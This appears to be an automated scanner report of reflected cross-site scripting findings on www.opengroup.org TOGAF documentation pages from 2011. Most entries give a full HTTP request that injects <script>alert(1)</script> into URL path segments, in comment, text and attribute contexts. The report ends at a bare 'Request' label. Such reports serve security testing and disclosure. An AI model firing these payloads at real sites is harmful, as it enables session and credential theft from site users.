Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.
The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.
Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).
The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.
The value of REST URL parameter 1 is copied into an HTML comment. The payload 71102--><script>alert(1)</script>ab500cf3d8b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /architecture71102--><script>alert(1)</script>ab500cf3d8b/togaf8-doc/arch/ HTTP/1.1 Host: www.opengroup.org Proxy-Connection: keep-alive Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=TOGAF Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=30649185.1298915328.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=TOGAF; __utma=30649185.357493113.1298915328.1298915328.1298915328.1; __utmc=30649185; __utmb=30649185.5.10.1298915328
Response
HTTP/1.1 404 Not Found Date: Mon, 28 Feb 2011 17:51:11 GMT Server: Apache/1.3.37 (Unix) PHP/4.4.4 Content-Type: text/html Content-Length: 4270
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload ca5d0<script>alert(1)</script>e940eee5ea was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /architectureca5d0<script>alert(1)</script>e940eee5ea/togaf8-doc/arch/ HTTP/1.1 Host: www.opengroup.org Proxy-Connection: keep-alive Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=TOGAF Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=30649185.1298915328.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=TOGAF; __utma=30649185.357493113.1298915328.1298915328.1298915328.1; __utmc=30649185; __utmb=30649185.5.10.1298915328
Response
HTTP/1.1 404 Not Found Date: Mon, 28 Feb 2011 17:51:08 GMT Server: Apache/1.3.37 (Unix) PHP/4.4.4 Content-Type: text/html Content-Length: 4262
The value of REST URL parameter 2 is copied into an HTML comment. The payload b5ef6--><script>alert(1)</script>8fb3022b3ea was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /architecture/togaf8-docb5ef6--><script>alert(1)</script>8fb3022b3ea/arch/ HTTP/1.1 Host: www.opengroup.org Proxy-Connection: keep-alive Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=TOGAF Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=30649185.1298915328.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=TOGAF; __utma=30649185.357493113.1298915328.1298915328.1298915328.1; __utmc=30649185; __utmb=30649185.5.10.1298915328
Response
HTTP/1.1 404 Not Found Date: Mon, 28 Feb 2011 17:51:31 GMT Server: Apache/1.3.37 (Unix) PHP/4.4.4 Content-Type: text/html Content-Length: 4270
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 14af3<script>alert(1)</script>b843f19b2cc was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /architecture/togaf8-doc14af3<script>alert(1)</script>b843f19b2cc/arch/ HTTP/1.1 Host: www.opengroup.org Proxy-Connection: keep-alive Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=TOGAF Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=30649185.1298915328.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=TOGAF; __utma=30649185.357493113.1298915328.1298915328.1298915328.1; __utmc=30649185; __utmb=30649185.5.10.1298915328
Response
HTTP/1.1 404 Not Found Date: Mon, 28 Feb 2011 17:51:28 GMT Server: Apache/1.3.37 (Unix) PHP/4.4.4 Content-Type: text/html Content-Length: 4264
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 3d8ea<script>alert(1)</script>c79ebfc2275 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /architecture/togaf8-doc/arch3d8ea<script>alert(1)</script>c79ebfc2275/ HTTP/1.1 Host: www.opengroup.org Proxy-Connection: keep-alive Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=TOGAF Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=30649185.1298915328.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=TOGAF; __utma=30649185.357493113.1298915328.1298915328.1298915328.1; __utmc=30649185; __utmb=30649185.5.10.1298915328
Response
HTTP/1.1 404 Not Found Date: Mon, 28 Feb 2011 17:51:50 GMT Server: Apache/1.3.37 (Unix) PHP/4.4.4 Content-Type: text/html Content-Length: 4264
The value of REST URL parameter 3 is copied into an HTML comment. The payload fd8d0--><script>alert(1)</script>e0d16d1920c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /architecture/togaf8-doc/archfd8d0--><script>alert(1)</script>e0d16d1920c/ HTTP/1.1 Host: www.opengroup.org Proxy-Connection: keep-alive Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=TOGAF Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=30649185.1298915328.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=TOGAF; __utma=30649185.357493113.1298915328.1298915328.1298915328.1; __utmc=30649185; __utmb=30649185.5.10.1298915328
Response
HTTP/1.1 404 Not Found Date: Mon, 28 Feb 2011 17:51:56 GMT Server: Apache/1.3.37 (Unix) PHP/4.4.4 Content-Type: text/html Content-Length: 4270
The value of REST URL parameter 1 is copied into an HTML comment. The payload b1689--><script>alert(1)</script>e2a73383cc7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /architectureb1689--><script>alert(1)</script>e2a73383cc7/togaf8-doc/arch/banner1.htm HTTP/1.1 Host: www.opengroup.org Proxy-Connection: keep-alive Referer: http://www.opengroup.org/architecture/togaf8-doc/arch/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=30649185.1298915328.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=TOGAF; __utma=30649185.357493113.1298915328.1298915328.1298915328.1; __utmc=30649185; __utmb=30649185.5.10.1298915328
Response
HTTP/1.1 404 Not Found Date: Mon, 28 Feb 2011 17:51:29 GMT Server: Apache/1.3.37 (Unix) PHP/4.4.4 Content-Type: text/html Content-Length: 5255
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 80c52"><script>alert(1)</script>f743f40b2e7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /architecture80c52"><script>alert(1)</script>f743f40b2e7/togaf8-doc/arch/banner1.htm HTTP/1.1 Host: www.opengroup.org Proxy-Connection: keep-alive Referer: http://www.opengroup.org/architecture/togaf8-doc/arch/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=30649185.1298915328.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=TOGAF; __utma=30649185.357493113.1298915328.1298915328.1298915328.1; __utmc=30649185; __utmb=30649185.5.10.1298915328
Response
HTTP/1.1 404 Not Found Date: Mon, 28 Feb 2011 17:51:23 GMT Server: Apache/1.3.37 (Unix) PHP/4.4.4 Content-Type: text/html Content-Length: 5252
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 5a499<script>alert(1)</script>2eeeb0b90fa was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /architecture5a499<script>alert(1)</script>2eeeb0b90fa/togaf8-doc/arch/banner1.htm HTTP/1.1 Host: www.opengroup.org Proxy-Connection: keep-alive Referer: http://www.opengroup.org/architecture/togaf8-doc/arch/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=30649185.1298915328.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=TOGAF; __utma=30649185.357493113.1298915328.1298915328.1298915328.1; __utmc=30649185; __utmb=30649185.5.10.1298915328
Response
HTTP/1.1 404 Not Found Date: Mon, 28 Feb 2011 17:51:26 GMT Server: Apache/1.3.37 (Unix) PHP/4.4.4 Content-Type: text/html Content-Length: 5246
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 3fff9<script>alert(1)</script>8559c6c8772 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /architecture/togaf8-doc3fff9<script>alert(1)</script>8559c6c8772/arch/banner1.htm HTTP/1.1 Host: www.opengroup.org Proxy-Connection: keep-alive Referer: http://www.opengroup.org/architecture/togaf8-doc/arch/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=30649185.1298915328.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=TOGAF; __utma=30649185.357493113.1298915328.1298915328.1298915328.1; __utmc=30649185; __utmb=30649185.5.10.1298915328
Response
HTTP/1.1 404 Not Found Date: Mon, 28 Feb 2011 17:51:50 GMT Server: Apache/1.3.37 (Unix) PHP/4.4.4 Content-Type: text/html Content-Length: 5246
The value of REST URL parameter 2 is copied into an HTML comment. The payload cd353--><script>alert(1)</script>471e5f4a359 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /architecture/togaf8-doccd353--><script>alert(1)</script>471e5f4a359/arch/banner1.htm HTTP/1.1 Host: www.opengroup.org Proxy-Connection: keep-alive Referer: http://www.opengroup.org/architecture/togaf8-doc/arch/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=30649185.1298915328.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=TOGAF; __utma=30649185.357493113.1298915328.1298915328.1298915328.1; __utmc=30649185; __utmb=30649185.5.10.1298915328
Response
HTTP/1.1 404 Not Found Date: Mon, 28 Feb 2011 17:51:55 GMT Server: Apache/1.3.37 (Unix) PHP/4.4.4 Content-Type: text/html Content-Length: 5255
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c907b"><script>alert(1)</script>22f08924d21 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /architecture/togaf8-docc907b"><script>alert(1)</script>22f08924d21/arch/banner1.htm HTTP/1.1 Host: www.opengroup.org Proxy-Connection: keep-alive Referer: http://www.opengroup.org/architecture/togaf8-doc/arch/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=30649185.1298915328.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=TOGAF; __utma=30649185.357493113.1298915328.1298915328.1298915328.1; __utmc=30649185; __utmb=30649185.5.10.1298915328
Response
HTTP/1.1 404 Not Found Date: Mon, 28 Feb 2011 17:51:42 GMT Server: Apache/1.3.37 (Unix) PHP/4.4.4 Content-Type: text/html Content-Length: 5252
The value of REST URL parameter 3 is copied into an HTML comment. The payload 3206c--><script>alert(1)</script>b9fc947417 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /architecture/togaf8-doc/arch3206c--><script>alert(1)</script>b9fc947417/banner1.htm HTTP/1.1 Host: www.opengroup.org Proxy-Connection: keep-alive Referer: http://www.opengroup.org/architecture/togaf8-doc/arch/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=30649185.1298915328.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=TOGAF; __utma=30649185.357493113.1298915328.1298915328.1298915328.1; __utmc=30649185; __utmb=30649185.5.10.1298915328
Response
HTTP/1.1 404 Not Found Date: Mon, 28 Feb 2011 17:52:09 GMT Server: Apache/1.3.37 (Unix) PHP/4.4.4 Content-Type: text/html Content-Length: 5252
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7aea1"><script>alert(1)</script>a0a70911350 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /architecture/togaf8-doc/arch7aea1"><script>alert(1)</script>a0a70911350/banner1.htm HTTP/1.1 Host: www.opengroup.org Proxy-Connection: keep-alive Referer: http://www.opengroup.org/architecture/togaf8-doc/arch/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=30649185.1298915328.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=TOGAF; __utma=30649185.357493113.1298915328.1298915328.1298915328.1; __utmc=30649185; __utmb=30649185.5.10.1298915328
Response
HTTP/1.1 404 Not Found Date: Mon, 28 Feb 2011 17:52:05 GMT Server: Apache/1.3.37 (Unix) PHP/4.4.4 Content-Type: text/html Content-Length: 5252
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 3a31e<script>alert(1)</script>a9ecc41592c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /architecture/togaf8-doc/arch3a31e<script>alert(1)</script>a9ecc41592c/banner1.htm HTTP/1.1 Host: www.opengroup.org Proxy-Connection: keep-alive Referer: http://www.opengroup.org/architecture/togaf8-doc/arch/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=30649185.1298915328.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=TOGAF; __utma=30649185.357493113.1298915328.1298915328.1298915328.1; __utmc=30649185; __utmb=30649185.5.10.1298915328
Response
HTTP/1.1 404 Not Found Date: Mon, 28 Feb 2011 17:52:07 GMT Server: Apache/1.3.37 (Unix) PHP/4.4.4 Content-Type: text/html Content-Length: 5246
The value of REST URL parameter 4 is copied into an HTML comment. The payload bd16a--><script>alert(1)</script>f6af9752da9 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /architecture/togaf8-doc/arch/banner1.htmbd16a--><script>alert(1)</script>f6af9752da9 HTTP/1.1 Host: www.opengroup.org Proxy-Connection: keep-alive Referer: http://www.opengroup.org/architecture/togaf8-doc/arch/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=30649185.1298915328.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=TOGAF; __utma=30649185.357493113.1298915328.1298915328.1298915328.1; __utmc=30649185; __utmb=30649185.5.10.1298915328
Response
HTTP/1.1 404 Not Found Date: Mon, 28 Feb 2011 17:52:22 GMT Server: Apache/1.3.37 (Unix) PHP/4.4.4 Content-Type: text/html Content-Length: 5255
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload b3d68<script>alert(1)</script>2e612c7e3a4 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /architecture/togaf8-doc/arch/banner1.htmb3d68<script>alert(1)</script>2e612c7e3a4 HTTP/1.1 Host: www.opengroup.org Proxy-Connection: keep-alive Referer: http://www.opengroup.org/architecture/togaf8-doc/arch/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=30649185.1298915328.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=TOGAF; __utma=30649185.357493113.1298915328.1298915328.1298915328.1; __utmc=30649185; __utmb=30649185.5.10.1298915328
Response
HTTP/1.1 404 Not Found Date: Mon, 28 Feb 2011 17:52:19 GMT Server: Apache/1.3.37 (Unix) PHP/4.4.4 Content-Type: text/html Content-Length: 5246
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b06e9"><script>alert(1)</script>c339ed24d73 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /architecture/togaf8-doc/arch/banner1.htmb06e9"><script>alert(1)</script>c339ed24d73 HTTP/1.1 Host: www.opengroup.org Proxy-Connection: keep-alive Referer: http://www.opengroup.org/architecture/togaf8-doc/arch/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=30649185.1298915328.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=TOGAF; __utma=30649185.357493113.1298915328.1298915328.1298915328.1; __utmc=30649185; __utmb=30649185.5.10.1298915328
Response
HTTP/1.1 404 Not Found Date: Mon, 28 Feb 2011 17:52:17 GMT Server: Apache/1.3.37 (Unix) PHP/4.4.4 Content-Type: text/html Content-Length: 5252
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3e36c"><script>alert(1)</script>e067f9695a3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /architecture3e36c"><script>alert(1)</script>e067f9695a3/togaf8-doc/arch/toc2.html HTTP/1.1 Host: www.opengroup.org Proxy-Connection: keep-alive Referer: http://www.opengroup.org/architecture/togaf8-doc/arch/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=30649185.1298915328.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=TOGAF; __utma=30649185.357493113.1298915328.1298915328.1298915328.1; __utmc=30649185; __utmb=30649185.5.10.1298915328
Response
HTTP/1.1 404 Not Found Date: Mon, 28 Feb 2011 17:51:23 GMT Server: Apache/1.3.37 (Unix) PHP/4.4.4 Content-Type: text/html Content-Length: 5246
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 11be1<script>alert(1)</script>3e620815dc4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /architecture11be1<script>alert(1)</script>3e620815dc4/togaf8-doc/arch/toc2.html HTTP/1.1 Host: www.opengroup.org Proxy-Connection: keep-alive Referer: http://www.opengroup.org/architecture/togaf8-doc/arch/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=30649185.1298915328.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=TOGAF; __utma=30649185.357493113.1298915328.1298915328.1298915328.1; __utmc=30649185; __utmb=30649185.5.10.1298915328
Response
HTTP/1.1 404 Not Found Date: Mon, 28 Feb 2011 17:51:24 GMT Server: Apache/1.3.37 (Unix) PHP/4.4.4 Content-Type: text/html Content-Length: 5240
The value of REST URL parameter 1 is copied into an HTML comment. The payload b44de--><script>alert(1)</script>bcb67e2a8d5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /architectureb44de--><script>alert(1)</script>bcb67e2a8d5/togaf8-doc/arch/toc2.html HTTP/1.1 Host: www.opengroup.org Proxy-Connection: keep-alive Referer: http://www.opengroup.org/architecture/togaf8-doc/arch/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=30649185.1298915328.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=TOGAF; __utma=30649185.357493113.1298915328.1298915328.1298915328.1; __utmc=30649185; __utmb=30649185.5.10.1298915328
Response
HTTP/1.1 404 Not Found Date: Mon, 28 Feb 2011 17:51:29 GMT Server: Apache/1.3.37 (Unix) PHP/4.4.4 Content-Type: text/html Content-Length: 5249
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload a7e1c<script>alert(1)</script>1741215fdf5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
